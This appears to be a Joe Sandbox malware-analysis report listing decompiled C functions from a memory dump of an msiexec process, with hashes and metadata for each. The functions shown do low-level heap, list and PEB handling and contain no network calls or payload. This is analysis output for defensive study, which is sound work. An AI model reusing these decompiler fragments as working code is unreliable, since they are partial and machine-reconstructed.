                              • Opcode Fuzzy Hash: 261126b98da6f2cd19269f0412b85b83cf57003f4bf17a0718ee9cf6670bfb2f
                              • Instruction Fuzzy Hash: 071148333051209BDF299E548D81A2F7266EBC5334B29012EEA1697380EA32BC02D691
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E04D94257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                              				intOrPtr* _t18;
                              				intOrPtr _t24;
                              				intOrPtr* _t27;
                              				intOrPtr* _t30;
                              				intOrPtr* _t31;
                              				intOrPtr _t33;
                              				intOrPtr* _t34;
                              				intOrPtr* _t35;
                              				void* _t37;
                              				void* _t38;
                              				void* _t39;
                              				void* _t43;
                              
                              				_t39 = __eflags;
                              				_t35 = __edi;
                              				_push(8);
                              				_push(0x4de08d0);
                              				E04D5D08C(__ebx, __edi, __esi);
                              				_t37 = __ecx;
                              				E04D941E8(__ebx, __edi, __ecx, _t39);
                              				E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                              				_t18 = _t37 + 8;
                              				_t33 =  *_t18;
                              				_t27 =  *((intOrPtr*)(_t18 + 4));
                              				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                              					L8:
                              					_push(3);
                              					asm("int 0x29");
                              				} else {
                              					 *_t27 = _t33;
                              					 *((intOrPtr*)(_t33 + 4)) = _t27;
                              					_t35 = 0x4df87e4;
                              					_t18 =  *0x4df87e0; // 0x0
                              					while(_t18 != 0) {
                              						_t43 = _t18 -  *0x4df5cd0; // 0xffffffff
                              						if(_t43 >= 0) {
                              							_t31 =  *0x4df87e4; // 0x0
                              							_t18 =  *_t31;
                              							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                              								goto L8;
                              							} else {
                              								 *0x4df87e4 = _t18;
                              								 *((intOrPtr*)(_t18 + 4)) = _t35;
                              								L04D07055(_t31 + 0xfffffff8);
                              								_t24 =  *0x4df87e0; // 0x0
                              								_t18 = _t24 - 1;
                              								 *0x4df87e0 = _t18;
                              								continue;
                              							}
                              						}
                              						goto L9;
                              					}
                              				}
                              				L9:
                              				__eflags =  *0x4df5cd0;
                              				if( *0x4df5cd0 <= 0) {
                              					L04D07055(_t37);
                              				} else {
                              					_t30 = _t37 + 8;
                              					_t34 =  *0x4df87e8; // 0x0
                              					__eflags =  *_t34 - _t35;
                              					if( *_t34 != _t35) {
                              						goto L8;
                              					} else {
                              						 *_t30 = _t35;
                              						 *((intOrPtr*)(_t30 + 4)) = _t34;
                              						 *_t34 = _t30;
                              						 *0x4df87e8 = _t30;
                              						 *0x4df87e0 = _t18 + 1;
                              					}
                              				}
                              				 *(_t38 - 4) = 0xfffffffe;
                              				return E04D5D0D1(L04D94320());
                              			}
















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa04a975315c83ee4891a0e99a30c34e14d19e7c33c7b5dc630b3ce76414a545
                              • Instruction ID: 10f14ef817ad1307d17277a1057f073f3eb7d55c72e6bbbb42afaf8e0ea44a20
                              • Opcode Fuzzy Hash: aa04a975315c83ee4891a0e99a30c34e14d19e7c33c7b5dc630b3ce76414a545
                              • Instruction Fuzzy Hash: 20213870605B01DFDF29EF66D060614BBF1FB45318B10826AD115CB392EB35BC42DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E04D846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                              				signed short* _v8;
                              				unsigned int _v12;
                              				intOrPtr _v16;
                              				signed int _t22;
                              				signed char _t23;
                              				short _t32;
                              				void* _t38;
                              				char* _t40;
                              
                              				_v12 = __edx;
                              				_t29 = 0;
                              				_v8 = __ecx;
                              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                              				_t38 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                              				if(_t38 != 0) {
                              					_t40 = _a4;
                              					 *_t40 = 1;
                              					E04D4F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                              					_t22 = _v12 >> 1;
                              					_t32 = 0x2e;
                              					 *((short*)(_t38 + _t22 * 2)) = _t32;
                              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                              					_t23 = E04D3D268(_t38, 1);
                              					asm("sbb al, al");
                              					 *_t40 =  ~_t23 + 1;
                              					L04D277F0(_v16, 0, _t38);
                              				} else {
                              					 *_a4 = 0;
                              					_t29 = 0xc0000017;
                              				}
                              				return _t29;
                              			}












                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                              • Instruction ID: 96ac13dd39b43711785944420f262e3a87ea85e6f9e7d81f1d2faabbb68871b6
                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                              • Instruction Fuzzy Hash: 3211E572604208BBDB159F5CD9808BEB7B9EF95304F10806EF984C7350DA319D55D7A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 34%
                              			E04D32397(intOrPtr _a4) {
                              				void* __ebx;
                              				void* __ecx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t11;
                              				void* _t19;
                              				void* _t25;
                              				void* _t26;
                              				intOrPtr _t27;
                              				void* _t28;
                              				void* _t29;
                              
                              				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                              				if( *0x4df848c != 0) {
                              					L04D2FAD0(0x4df8610);
                              					if( *0x4df848c == 0) {
                              						E04D2FA00(0x4df8610, _t19, _t27, 0x4df8610);
                              						goto L1;
                              					} else {
                              						_push(0);
                              						_push(_a4);
                              						_t26 = 4;
                              						_t29 = E04D32581(0x4df8610, 0x4ce50a0, _t26, _t27, _t28);
                              						E04D2FA00(0x4df8610, 0x4ce50a0, _t27, 0x4df8610);
                              					}
                              				} else {
                              					L1:
                              					_t11 =  *0x4df8614; // 0x1
                              					if(_t11 == 0) {
                              						_t11 = E04D44886(0x4ce1088, 1, 0x4df8614);
                              					}
                              					_push(0);
                              					_push(_a4);
                              					_t25 = 4;
                              					_t29 = E04D32581(0x4df8610, (_t11 << 4) + 0x4ce5070, _t25, _t27, _t28);
                              				}
                              				if(_t29 != 0) {
                              					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                              					 *((char*)(_t29 + 0x40)) = 0;
                              				}
                              				return _t29;
                              			}
















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96dc39dd0bc6c1f1f77ecd3fc397cf6bb1df972f7ee003a45f8fd006d4e38866
                              • Instruction ID: 56257775c2241649a196e8d6c892e0a020836b0eae7f1aa491b0fa7c888a9e99
                              • Opcode Fuzzy Hash: 96dc39dd0bc6c1f1f77ecd3fc397cf6bb1df972f7ee003a45f8fd006d4e38866
                              • Instruction Fuzzy Hash: E1114271B0031077F730AB299C50B15B6D9FB50B2AF14445EF601A7240D774F8409765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E04D437F5(void* __ecx, intOrPtr* __edx) {
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t6;
                              				intOrPtr _t13;
                              				intOrPtr* _t20;
                              				intOrPtr* _t27;
                              				void* _t28;
                              				intOrPtr* _t29;
                              
                              				_t27 = __edx;
                              				_t28 = __ecx;
                              				if(__edx == 0) {
                              					E04D22280(_t6, 0x4df8550);
                              				}
                              				_t29 = E04D4387E(_t28);
                              				if(_t29 == 0) {
                              					L6:
                              					if(_t27 == 0) {
                              						E04D1FFB0(0x4df8550, _t27, 0x4df8550);
                              					}
                              					if(_t29 == 0) {
                              						return 0xc0000225;
                              					} else {
                              						if(_t27 != 0) {
                              							goto L14;
                              						}
                              						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                              						goto L11;
                              					}
                              				} else {
                              					_t13 =  *_t29;
                              					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                              						L13:
                              						_push(3);
                              						asm("int 0x29");
                              						L14:
                              						 *_t27 = _t29;
                              						L11:
                              						return 0;
                              					}
                              					_t20 =  *((intOrPtr*)(_t29 + 4));
                              					if( *_t20 != _t29) {
                              						goto L13;
                              					}
                              					 *_t20 = _t13;
                              					 *((intOrPtr*)(_t13 + 4)) = _t20;
                              					asm("btr eax, ecx");
                              					goto L6;
                              				}
                              			}












                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ed638fafe3ab19df65b8ca3a295c87a847b9c384d8104b6883b81e0282253c11
                              • Instruction ID: b6cb56e472cf2afe024d26a830606f7ded1841eafdccbd3bdf37aeef585393a6
                              • Opcode Fuzzy Hash: ed638fafe3ab19df65b8ca3a295c87a847b9c384d8104b6883b81e0282253c11
                              • Instruction Fuzzy Hash: 26018472B056109BD7379F1D9940A2AFBA6EFC5B7471A4069ED499B311D730F801C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 42%
                              			E04D0C962(char __ecx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t19;
                              				char _t22;
                              				void* _t26;
                              				void* _t27;
                              				char _t32;
                              				char _t34;
                              				void* _t35;
                              				void* _t37;
                              				intOrPtr* _t38;
                              				signed int _t39;
                              
                              				_t41 = (_t39 & 0xfffffff8) - 0xc;
                              				_v8 =  *0x4dfd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                              				_t34 = __ecx;
                              				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                              					_t26 = 0;
                              					E04D1EEF0(0x4df70a0);
                              					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                              					if(E04D8F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                              						L9:
                              						E04D1EB70(_t29, 0x4df70a0);
                              						_t19 = _t26;
                              						L2:
                              						_pop(_t35);
                              						_pop(_t37);
                              						_pop(_t27);
                              						return E04D4B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                              					}
                              					_t29 = _t34;
                              					_t26 = E04D8F1FC(_t34, _t32);
                              					if(_t26 < 0) {
                              						goto L9;
                              					}
                              					_t38 =  *0x4df70c0; // 0x0
                              					while(_t38 != 0x4df70c0) {
                              						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                              						_t38 =  *_t38;
                              						_v12 = _t22;
                              						if(_t22 != 0) {
                              							_t29 = _t22;
                              							 *0x4dfb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                              							_v12();
                              						}
                              					}
                              					goto L9;
                              				}
                              				_t19 = 0;
                              				goto L2;
                              			}



















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0dcfe1a2c1a0fe643a67ce2dac8c3665d47a486b107336e3cacc0088d632b87a
                              • Instruction ID: 35268bef60719c1dbe6a958dab0ab0b6010f8cf3ffa82926858b1a2764035f20
                              • Opcode Fuzzy Hash: 0dcfe1a2c1a0fe643a67ce2dac8c3665d47a486b107336e3cacc0088d632b87a
                              • Instruction Fuzzy Hash: 4E11CE32700646ABD720AF68DD95A6ABBF5FF88614B00093DED4587690EB60FC54CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D3002D() {
                              				void* _t11;
                              				char* _t14;
                              				signed char* _t16;
                              				char* _t27;
                              				signed char* _t29;
                              
                              				_t11 = E04D27D50();
                              				_t27 = 0x7ffe0384;
                              				if(_t11 != 0) {
                              					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              				} else {
                              					_t14 = 0x7ffe0384;
                              				}
                              				_t29 = 0x7ffe0385;
                              				if( *_t14 != 0) {
                              					if(E04D27D50() == 0) {
                              						_t16 = 0x7ffe0385;
                              					} else {
                              						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              					}
                              					if(( *_t16 & 0x00000040) != 0) {
                              						goto L18;
                              					} else {
                              						goto L3;
                              					}
                              				} else {
                              					L3:
                              					if(E04D27D50() != 0) {
                              						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					}
                              					if( *_t27 != 0) {
                              						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                              							goto L5;
                              						}
                              						if(E04D27D50() != 0) {
                              							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              						}
                              						if(( *_t29 & 0x00000020) == 0) {
                              							goto L5;
                              						}
                              						L18:
                              						return 1;
                              					} else {
                              						L5:
                              						return 0;
                              					}
                              				}
                              			}









                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                              • Instruction ID: eafb4f570e1fabb792c046296a78cb37c163652a62d09d56af494ce9598a547e
                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                              • Instruction Fuzzy Hash: 3C11AD32706681CFE7239B28CE55B3577A4FB41B5DF0900A1DD448B692F768FC41C660
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E04D1766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                              				char _v8;
                              				void* _t22;
                              				void* _t24;
                              				intOrPtr _t29;
                              				intOrPtr* _t30;
                              				void* _t42;
                              				intOrPtr _t47;
                              
                              				_push(__ecx);
                              				_t36 =  &_v8;
                              				if(E04D3F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                              					L10:
                              					_t22 = 0;
                              				} else {
                              					_t24 = _v8 + __ecx;
                              					_t42 = _t24;
                              					if(_t24 < __ecx) {
                              						goto L10;
                              					} else {
                              						if(E04D3F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                              							goto L10;
                              						} else {
                              							_t29 = _v8 + _t42;
                              							if(_t29 < _t42) {
                              								goto L10;
                              							} else {
                              								_t47 = _t29;
                              								_t30 = _a16;
                              								if(_t30 != 0) {
                              									 *_t30 = _t47;
                              								}
                              								if(_t47 == 0) {
                              									goto L10;
                              								} else {
                              									_t22 = L04D24620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t22;
                              			}











                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                              • Instruction ID: ef28075fd9aa3184fb0efea356fc7ffc4e3d3d39dce10b6c6b6cd4bc643239ba
                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                              • Instruction Fuzzy Hash: A9017132701119BBD761EE5EDD41E5B76ADEB88760B240524FD48CB274DA30ED0187A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E04D9C450(intOrPtr* _a4) {
                              				signed char _t25;
                              				intOrPtr* _t26;
                              				intOrPtr* _t27;
                              
                              				_t26 = _a4;
                              				_t25 =  *(_t26 + 0x10);
                              				if((_t25 & 0x00000003) != 1) {
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push( *((intOrPtr*)(_t26 + 8)));
                              					_push(0);
                              					_push( *_t26);
                              					E04D49910();
                              					_t25 =  *(_t26 + 0x10);
                              				}
                              				if((_t25 & 0x00000001) != 0) {
                              					_push(4);
                              					_t7 = _t26 + 4; // 0x4
                              					_t27 = _t7;
                              					_push(_t27);
                              					_push(5);
                              					_push(0xfffffffe);
                              					E04D495B0();
                              					if( *_t27 != 0) {
                              						_push( *_t27);
                              						E04D495D0();
                              					}
                              				}
                              				_t8 = _t26 + 0x14; // 0x14
                              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                              				}
                              				_push( *_t26);
                              				E04D495D0();
                              				return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                              			}







                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                              • Instruction ID: 9d828e7af5aacaddfed7db467e23ddde74f18b37f5f0ac58e2b217dade385658
                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                              • Instruction Fuzzy Hash: 130180B2340545BFEB21AF65CC94E63BB6DFB94798F104525F11483560CB21BCA0CAB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E04D09080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                              				intOrPtr* _t51;
                              				intOrPtr _t59;
                              				signed int _t64;
                              				signed int _t67;
                              				signed int* _t71;
                              				signed int _t74;
                              				signed int _t77;
                              				signed int _t82;
                              				intOrPtr* _t84;
                              				void* _t85;
                              				intOrPtr* _t87;
                              				void* _t94;
                              				signed int _t95;
                              				intOrPtr* _t97;
                              				signed int _t99;
                              				signed int _t102;
                              				void* _t104;
                              
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t97 = __ecx;
                              				_t102 =  *(__ecx + 0x14);
                              				if((_t102 & 0x02ffffff) == 0x2000000) {
                              					_t102 = _t102 | 0x000007d0;
                              				}
                              				_t48 =  *[fs:0x30];
                              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                              					_t102 = _t102 & 0xff000000;
                              				}
                              				_t80 = 0x4df85ec;
                              				E04D22280(_t48, 0x4df85ec);
                              				_t51 =  *_t97 + 8;
                              				if( *_t51 != 0) {
                              					L6:
                              					return E04D1FFB0(_t80, _t97, _t80);
                              				} else {
                              					 *(_t97 + 0x14) = _t102;
                              					_t84 =  *0x4df538c; // 0x305ca10
                              					if( *_t84 != 0x4df5388) {
                              						_t85 = 3;
                              						asm("int 0x29");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						_push(0x2c);
                              						_push(0x4ddf6e8);
                              						E04D5D0E8(0x4df85ec, _t97, _t102);
                              						 *((char*)(_t104 - 0x1d)) = 0;
                              						_t99 =  *(_t104 + 8);
                              						__eflags = _t99;
                              						if(_t99 == 0) {
                              							L13:
                              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                              							if(__eflags == 0) {
                              								E04DD88F5(_t80, _t85, 0x4df5388, _t99, _t102, __eflags);
                              							}
                              						} else {
                              							__eflags = _t99 -  *0x4df86c0; // 0x30507b0
                              							if(__eflags == 0) {
                              								goto L13;
                              							} else {
                              								__eflags = _t99 -  *0x4df86b8; // 0x0
                              								if(__eflags == 0) {
                              									goto L13;
                              								} else {
                              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                              									__eflags =  *((char*)(_t59 + 0x28));
                              									if( *((char*)(_t59 + 0x28)) == 0) {
                              										E04D22280(_t99 + 0xe0, _t99 + 0xe0);
                              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                              										__eflags =  *((char*)(_t99 + 0xe5));
                              										if(__eflags != 0) {
                              											E04DD88F5(0x4df85ec, _t85, 0x4df5388, _t99, _t102, __eflags);
                              										} else {
                              											__eflags =  *((char*)(_t99 + 0xe4));
                              											if( *((char*)(_t99 + 0xe4)) == 0) {
                              												 *((char*)(_t99 + 0xe4)) = 1;
                              												_push(_t99);
                              												_push( *((intOrPtr*)(_t99 + 0x24)));
                              												E04D4AFD0();
                              											}
                              											while(1) {
                              												_t71 = _t99 + 8;
                              												 *(_t104 - 0x2c) = _t71;
                              												_t80 =  *_t71;
                              												_t95 = _t71[1];
                              												 *(_t104 - 0x28) = _t80;
                              												 *(_t104 - 0x24) = _t95;
                              												while(1) {
                              													L19:
                              													__eflags = _t95;
                              													if(_t95 == 0) {
                              														break;
                              													}
                              													_t102 = _t80;
                              													 *(_t104 - 0x30) = _t95;
                              													 *(_t104 - 0x24) = _t95 - 1;
                              													asm("lock cmpxchg8b [edi]");
                              													_t80 = _t102;
                              													 *(_t104 - 0x28) = _t80;
                              													 *(_t104 - 0x24) = _t95;
                              													__eflags = _t80 - _t102;
                              													_t99 =  *(_t104 + 8);
                              													if(_t80 != _t102) {
                              														continue;
                              													} else {
                              														__eflags = _t95 -  *(_t104 - 0x30);
                              														if(_t95 !=  *(_t104 - 0x30)) {
                              															continue;
                              														} else {
                              															__eflags = _t95;
                              															if(_t95 != 0) {
                              																_t74 = 0;
                              																 *(_t104 - 0x34) = 0;
                              																_t102 = 0;
                              																__eflags = 0;
                              																while(1) {
                              																	 *(_t104 - 0x3c) = _t102;
                              																	__eflags = _t102 - 3;
                              																	if(_t102 >= 3) {
                              																		break;
                              																	}
                              																	__eflags = _t74;
                              																	if(_t74 != 0) {
                              																		L49:
                              																		_t102 =  *_t74;
                              																		__eflags = _t102;
                              																		if(_t102 != 0) {
                              																			_t102 =  *(_t102 + 4);
                              																			__eflags = _t102;
                              																			if(_t102 != 0) {
                              																				 *0x4dfb1e0(_t74, _t99);
                              																				 *_t102();
                              																			}
                              																		}
                              																		do {
                              																			_t71 = _t99 + 8;
                              																			 *(_t104 - 0x2c) = _t71;
                              																			_t80 =  *_t71;
                              																			_t95 = _t71[1];
                              																			 *(_t104 - 0x28) = _t80;
                              																			 *(_t104 - 0x24) = _t95;
                              																			goto L19;
                              																		} while (_t74 == 0);
                              																		goto L49;
                              																	} else {
                              																		_t82 = 0;
                              																		__eflags = 0;
                              																		while(1) {
                              																			 *(_t104 - 0x38) = _t82;
                              																			__eflags = _t82 -  *0x4df84c0;
                              																			if(_t82 >=  *0x4df84c0) {
                              																				break;
                              																			}
                              																			__eflags = _t74;
                              																			if(_t74 == 0) {
                              																				_t77 = E04DD9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                              																				__eflags = _t77;
                              																				if(_t77 == 0) {
                              																					_t74 = 0;
                              																					__eflags = 0;
                              																				} else {
                              																					_t74 = _t77 + 0xfffffff4;
                              																				}
                              																				 *(_t104 - 0x34) = _t74;
                              																				_t82 = _t82 + 1;
                              																				continue;
                              																			}
                              																			break;
                              																		}
                              																		_t102 = _t102 + 1;
                              																		continue;
                              																	}
                              																	goto L20;
                              																}
                              																__eflags = _t74;
                              															}
                              														}
                              													}
                              													break;
                              												}
                              												L20:
                              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                              												 *((char*)(_t99 + 0xe5)) = 1;
                              												 *((char*)(_t104 - 0x1d)) = 1;
                              												goto L21;
                              											}
                              										}
                              										L21:
                              										 *(_t104 - 4) = 0xfffffffe;
                              										E04D0922A(_t99);
                              										_t64 = E04D27D50();
                              										__eflags = _t64;
                              										if(_t64 != 0) {
                              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              										} else {
                              											_t67 = 0x7ffe0386;
                              										}
                              										__eflags =  *_t67;
                              										if( *_t67 != 0) {
                              											_t67 = E04DD8B58(_t99);
                              										}
                              										__eflags =  *((char*)(_t104 - 0x1d));
                              										if( *((char*)(_t104 - 0x1d)) != 0) {
                              											__eflags = _t99 -  *0x4df86c0; // 0x30507b0
                              											if(__eflags != 0) {
                              												__eflags = _t99 -  *0x4df86b8; // 0x0
                              												if(__eflags == 0) {
                              													_t94 = 0x4df86bc;
                              													_t87 = 0x4df86b8;
                              													goto L27;
                              												} else {
                              													__eflags = _t67 | 0xffffffff;
                              													asm("lock xadd [edi], eax");
                              													if(__eflags == 0) {
                              														E04D09240(_t80, _t99, _t99, _t102, __eflags);
                              													}
                              												}
                              											} else {
                              												_t94 = 0x4df86c4;
                              												_t87 = 0x4df86c0;
                              												L27:
                              												E04D39B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                              											}
                              										}
                              									} else {
                              										goto L13;
                              									}
                              								}
                              							}
                              						}
                              						return E04D5D130(_t80, _t99, _t102);
                              					} else {
                              						 *_t51 = 0x4df5388;
                              						 *((intOrPtr*)(_t51 + 4)) = _t84;
                              						 *_t84 = _t51;
                              						 *0x4df538c = _t51;
                              						goto L6;
                              					}
                              				}
                              			}





















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbc31b5233ae4efac103129706d9fb8462e3e5ce47e81805038f88adf20fb433
                              • Instruction ID: cdbdcd3f5b46254fd786989f2353fcd4564ee38d4e9d7b381dc1b8022e1c736b
                              • Opcode Fuzzy Hash: fbc31b5233ae4efac103129706d9fb8462e3e5ce47e81805038f88adf20fb433
                              • Instruction Fuzzy Hash: 1001D1B27012009FE7249F18E860B1177F9FB41325F2280A6E6059B792C374FC41CBA0
                              Uniqueness

